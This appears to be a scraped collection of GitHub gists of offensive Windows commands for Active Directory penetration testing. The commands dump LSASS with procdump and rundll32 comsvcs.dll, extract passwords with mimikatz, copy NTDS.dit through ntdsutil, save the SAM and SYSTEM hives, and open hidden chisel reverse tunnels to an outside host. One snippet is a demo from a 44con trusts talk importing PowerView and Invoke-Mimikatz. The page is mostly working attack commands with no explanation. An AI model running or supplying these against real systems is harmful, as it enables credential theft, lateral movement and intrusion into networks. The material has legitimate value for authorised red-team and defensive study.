This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| dir "Registry::HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" -Name | |
| reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| net use Z: https://live.sysinternals.com | |
| Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp | |
| sekurlsa::minidump lsass.dmp | |
| sekurlsa::logonPasswords | |
| ******************************* | |
| Dump LSASS with rundll32 | |
| rundll32.exe C:\Windows\System32\comsvcs.dll #24 "<PID> lsass.dmp full" | |
| rundll32.exe comsvcs.dll #24 "<PID> lsass.dmp full" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ./chisel_linux_amd64 server -p 8080 --reverse -host 1.1.1.1 | |
| Start-Process C:\chisel.exe -ArgumentList "client 1.1.1.1:8080 R:9000:172.30.10.28:3389" -WindowStyle Hidden | |
| TUN: | |
| c: | |
| chisel.exe client ipsrv:port R:8001:127.0.0.1:9001 | |
| chisel.exe server -p 9001 --socks5 | |
| s: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| nltest.exe /trusted_domains |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Get-ADComputer -Properties * -Filter {(OperatingSystem -like "*Windows S*")} | Sort Description | FT Name,Description,OperatingSystem -AutoSize | Out-String -Width 300 | Out-File ServerListing.csv |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest())[0].RootDomain.Name | |
| (New-Object System.Security.Principal.NTAccount("testlab.local","krbtgt")).Translate([System.Security.Principal.SecurityIdentifier]).Value |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Demo for the 44con "Trusts You Might Have Missed" presentation | |
| HarmJ0y | |
| ***************************************************************************************************************************** | |
| # import PowerView and Invoke-Mimikatz | |
| Import-Module .\powerview.ps1 | |
| Import-Module .\mimikatz.ps1 | |
| # map all reachable domain trusts | |
| Invoke-MapDomainTrust |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cd c:\users | |
| Get-ChildItem | ForEach-Object{ | |
| $class = if($_.PSIsContainer) {"Win32_Directory"} else {"CIM_DataFile"} | |
| Get-WMIObject $class -Filter "Name = '$($_.FullName -replace '\\','\\')'" | Select-Object -ExpandProperty EightDotThreeFileName | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| reg save HKLM\SYSTEM SystemBkup.hiv | |
| reg save HKLM\SAM SamBkup.hiv | |
| mimikatz # lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv |